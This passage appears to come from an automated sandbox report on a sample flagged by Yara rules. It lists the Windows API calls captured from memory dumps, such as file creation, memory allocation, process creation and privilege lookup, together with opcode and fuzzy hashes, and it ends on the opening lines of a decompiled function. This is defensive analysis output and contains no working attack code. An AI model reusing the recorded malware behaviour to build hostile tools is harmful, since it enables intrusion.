                                                                                                                                                            • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                            • Instruction Fuzzy Hash: EC918D31D0020AEBDF24EF98C8556EEB7B8FF95314F20947AD441EB2A2E7344A41CB91
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Executed Functions

                                                                                                                                                            APIs
                                                                                                                                                            • NtReadFile.NTDLL(?,?,FFFFFFFF,000D4A01,?,?,?,?,000D4A01,FFFFFFFF,?,BM,?,00000000), ref: 000D9E55
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileRead
                                                                                                                                                            • String ID: H
                                                                                                                                                            • API String ID: 2738559852-2720017708
                                                                                                                                                            • Opcode ID: c1fa000e90d34bf42ddfbf86a07caf1619767b7776371418e6baa9b9c10b0ef5
                                                                                                                                                            • Instruction ID: 82abba1e89702cd9db0729bc189aaa029af524568d380deb68ae49b1097be5b8
                                                                                                                                                            • Opcode Fuzzy Hash: c1fa000e90d34bf42ddfbf86a07caf1619767b7776371418e6baa9b9c10b0ef5
                                                                                                                                                            • Instruction Fuzzy Hash: 7321DBB6200208AFDB14DF99DC94EEB77A9EF8C714F158649BE1DA7241C630E811CBA0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,000D4B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000D4B87,007A002E,00000000,00000060,00000000,00000000), ref: 000D9DAD
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                            • String ID: .z`
                                                                                                                                                            • API String ID: 823142352-1441809116
                                                                                                                                                            • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                            • Instruction ID: 2e6de0adc303a25ffa1861b19db1812300d1f896f3101c2d979b27e1fb2a7d94
                                                                                                                                                            • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                            • Instruction Fuzzy Hash: CCF0B2B2200208ABCB08CF88DC95EEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,000D4B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000D4B87,007A002E,00000000,00000060,00000000,00000000), ref: 000D9DAD
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                            • String ID: .z`
                                                                                                                                                            • API String ID: 823142352-1441809116
                                                                                                                                                            • Opcode ID: 86142fc715fd6b29a1cd1e0a8e5842023ce0c7e8d2a8b88b8c4b4948ad2c766f
                                                                                                                                                            • Instruction ID: af1378a9475db2060b3eab7b79125e47130d6aac356c9c8531852839504ad9c6
                                                                                                                                                            • Opcode Fuzzy Hash: 86142fc715fd6b29a1cd1e0a8e5842023ce0c7e8d2a8b88b8c4b4948ad2c766f
                                                                                                                                                            • Instruction Fuzzy Hash: F8F07FB2201108AFCB48CF98DC95EEB77A9EF8C754F158248FA1DE7241D630E851CBA4
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,000D4B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000D4B87,007A002E,00000000,00000060,00000000,00000000), ref: 000D9DAD
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                            • String ID: .z`
                                                                                                                                                            • API String ID: 823142352-1441809116
                                                                                                                                                            • Opcode ID: 7d1d0dd45730a3cab19d534196467145361a0f767e4c637b4ebc2c5e092f58ac
                                                                                                                                                            • Instruction ID: 04c64c90921e39cfdd324f6a40898d6b5460ba20f7e357acf6879422449f5e61
                                                                                                                                                            • Opcode Fuzzy Hash: 7d1d0dd45730a3cab19d534196467145361a0f767e4c637b4ebc2c5e092f58ac
                                                                                                                                                            • Instruction Fuzzy Hash: CAF079B2204109AF8B48DE8CD881CEB73AAAF8C744B118208FA0DD3240D630E8518BA4
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • NtClose.NTDLL( M,?,?,000D4D20,00000000,FFFFFFFF), ref: 000D9EB5
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Close
                                                                                                                                                            • String ID: M
                                                                                                                                                            • API String ID: 3535843008-4234859015
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • NtReadFile.NTDLL(?,?,FFFFFFFF,000D4A01,?,?,?,?,000D4A01,FFFFFFFF,?,BM,?,00000000), ref: 000D9E55
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileRead
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,000C2D11,00002000,00003000,00000004), ref: 000D9F79
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocateMemoryVirtual
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2167126740-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2380389755.00000000021C0000.00000040.00000001.sdmp, Offset: 021B0000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2380381681.00000000021B0000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380554938.00000000022A0000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380560407.00000000022B0000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380566043.00000000022B4000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380572289.00000000022B7000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380578244.00000000022C0000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380623418.0000000002320000.00000040.00000001.sdmp
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2380389755.00000000021C0000.00000040.00000001.sdmp, Offset: 021B0000, based on PE: true
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2380389755.00000000021C0000.00000040.00000001.sdmp, Offset: 021B0000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2380381681.00000000021B0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380554938.00000000022A0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380560407.00000000022B0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380566043.00000000022B4000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380572289.00000000022B7000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380578244.00000000022C0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380623418.0000000002320000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                            • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                            • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                                                                                            • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                            • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2380389755.00000000021C0000.00000040.00000001.sdmp, Offset: 021B0000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2380381681.00000000021B0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380554938.00000000022A0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380560407.00000000022B0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380566043.00000000022B4000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380572289.00000000022B7000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380578244.00000000022C0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380623418.0000000002320000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                            • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                            • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                                                                                                            • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                            • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2380389755.00000000021C0000.00000040.00000001.sdmp, Offset: 021B0000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2380381681.00000000021B0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380554938.00000000022A0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380560407.00000000022B0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380566043.00000000022B4000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380572289.00000000022B7000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380578244.00000000022C0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380623418.0000000002320000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                            • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                            • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                                                                                                            • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                            • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2380389755.00000000021C0000.00000040.00000001.sdmp, Offset: 021B0000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2380381681.00000000021B0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380554938.00000000022A0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380560407.00000000022B0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380566043.00000000022B4000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380572289.00000000022B7000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380578244.00000000022C0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380623418.0000000002320000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                            • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                            • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                                                                                            • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                            • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2380389755.00000000021C0000.00000040.00000001.sdmp, Offset: 021B0000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2380381681.00000000021B0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380554938.00000000022A0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380560407.00000000022B0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380566043.00000000022B4000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380572289.00000000022B7000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380578244.00000000022C0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380623418.0000000002320000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                            • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                            • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                                                                                            • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                            • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2380389755.00000000021C0000.00000040.00000001.sdmp, Offset: 021B0000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2380381681.00000000021B0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380554938.00000000022A0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380560407.00000000022B0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380566043.00000000022B4000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380572289.00000000022B7000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380578244.00000000022C0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380623418.0000000002320000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                            • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                            • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                                                                                            • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                            • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2380389755.00000000021C0000.00000040.00000001.sdmp, Offset: 021B0000, based on PE: true
• Associated: 00000008.00000002.2380381681.00000000021B0000.00000040.00000001.sdmp
• Associated: 00000008.00000002.2380554938.00000000022A0000.00000040.00000001.sdmp
• Associated: 00000008.00000002.2380560407.00000000022B0000.00000040.00000001.sdmp
• Associated: 00000008.00000002.2380566043.00000000022B4000.00000040.00000001.sdmp
• Associated: 00000008.00000002.2380572289.00000000022B7000.00000040.00000001.sdmp
• Associated: 00000008.00000002.2380578244.00000000022C0000.00000040.00000001.sdmp
• Associated: 00000008.00000002.2380623418.0000000002320000.00000040.00000001.sdmp
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2380389755.00000000021C0000.00000040.00000001.sdmp, Offset: 021B0000, based on PE: true
• Associated: 00000008.00000002.2380381681.00000000021B0000.00000040.00000001.sdmp
• Associated: 00000008.00000002.2380554938.00000000022A0000.00000040.00000001.sdmp
• Associated: 00000008.00000002.2380560407.00000000022B0000.00000040.00000001.sdmp
• Associated: 00000008.00000002.2380566043.00000000022B4000.00000040.00000001.sdmp
• Associated: 00000008.00000002.2380572289.00000000022B7000.00000040.00000001.sdmp
• Associated: 00000008.00000002.2380578244.00000000022C0000.00000040.00000001.sdmp
• Associated: 00000008.00000002.2380623418.0000000002320000.00000040.00000001.sdmp
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2380389755.00000000021C0000.00000040.00000001.sdmp, Offset: 021B0000, based on PE: true
• Associated: 00000008.00000002.2380381681.00000000021B0000.00000040.00000001.sdmp
• Associated: 00000008.00000002.2380554938.00000000022A0000.00000040.00000001.sdmp
• Associated: 00000008.00000002.2380560407.00000000022B0000.00000040.00000001.sdmp
• Associated: 00000008.00000002.2380566043.00000000022B4000.00000040.00000001.sdmp
• Associated: 00000008.00000002.2380572289.00000000022B7000.00000040.00000001.sdmp
• Associated: 00000008.00000002.2380578244.00000000022C0000.00000040.00000001.sdmp
• Associated: 00000008.00000002.2380623418.0000000002320000.00000040.00000001.sdmp
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,000C3AF8), ref: 000DA09D
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FreeHeap
                                                                                                                                                            • String ID: .z`
                                                                                                                                                            • API String ID: 3298025750-1441809116
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,000C3AF8), ref: 000DA09D
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FreeHeap
                                                                                                                                                            • String ID: .z`
                                                                                                                                                            • API String ID: 3298025750-1441809116
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000C834A
                                                                                                                                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000C836B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1836367815-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000C834A
                                                                                                                                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000C836B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1836367815-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000DA134
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateInternalProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2186235152-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000DA134
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateInternalProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2186235152-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • RtlAllocateHeap.NTDLL(000D4506,?,000D4C7F,000D4C7F,?,000D4506,?,?,?,?,?,00000000,00000000,?), ref: 000DA05D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,000CF1A2,000CF1A2,?,00000000,?,?), ref: 000DA200
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: LookupPrivilegeValue
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3899507212-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • SetErrorMode.KERNELBASE(00008003,?,000C8CF4,?), ref: 000CF6CB
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorMode
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2340568224-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • RtlAllocateHeap.NTDLL(000D4506,?,000D4C7F,000D4C7F,?,000D4506,?,?,?,?,?,00000000,00000000,?), ref: 000DA05D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Non-executed Functions

                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                            			E021F8788(signed int __ecx, void* __edx, signed int _a4) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				short* _v12;
                                                                                                                                                            				void* _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				char _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				char _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				char _v44;
                                                                                                                                                            				signed int _v48;
                                                                                                                                                            				signed int _v52;
                                                                                                                                                            				signed int _v56;
                                                                                                                                                            				signed int _v60;
                                                                                                                                                            				char _v68;
                                                                                                                                                            				void* _t216;
                                                                                                                                                            				intOrPtr _t231;
                                                                                                                                                            				short* _t235;
                                                                                                                                                            				intOrPtr _t257;
                                                                                                                                                            				short* _t261;
                                                                                                                                                            				intOrPtr _t284;
                                                                                                                                                            				intOrPtr _t288;
                                                                                                                                                            				void* _t314;
                                                                                                                                                            				signed int _t318;
                                                                                                                                                            				short* _t319;
                                                                                                                                                            				intOrPtr _t321;
                                                                                                                                                            				void* _t328;
                                                                                                                                                            				void* _t329;
                                                                                                                                                            				char* _t332;
                                                                                                                                                            				signed int _t333;
                                                                                                                                                            				signed int* _t334;
